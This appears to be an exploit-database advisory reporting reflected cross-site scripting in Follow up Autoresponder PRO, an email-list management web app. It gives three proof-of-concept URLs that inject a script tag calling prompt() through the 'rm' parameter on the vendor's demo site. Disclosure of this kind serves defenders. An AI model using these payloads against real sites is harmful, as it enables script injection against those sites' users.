Autoresponder PRO Cross Site Scripting

2014.01.21

Credit: TUNISIAN CYBER

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

[+] Author: TUNISIAN CYBER
[+] Exploit Title: Follow up Autoresponder PRO Cross Site Scripting vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Vendor: http://www.scripts4webmasters.com/
[+] Friendly Sites: na3il.com,th3-creative.com
###############################################################
+Description:
Web based php/mysql email list management software where you can get subscriber names, email addresses to do contact management email marketing.

+Exploit:
Follow up Autoresponder PRO suffers from a Cross Site Scripting vulnerability

+PoC:(Tested on Demo)
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(986987)</ScRiPt>
http://www.scripts4webmasters.com/arppro-demo/?rm=license'%22()%26%25<ScRiPt%20>prompt(941203)</ScRiPt>
http://www.scripts4webmasters.com/arppro-demo/?rm=send_login_info'%22()%26%25<ScRiPt%20>prompt(918540)</ScRiPt>

########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Autoresponder PRO Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.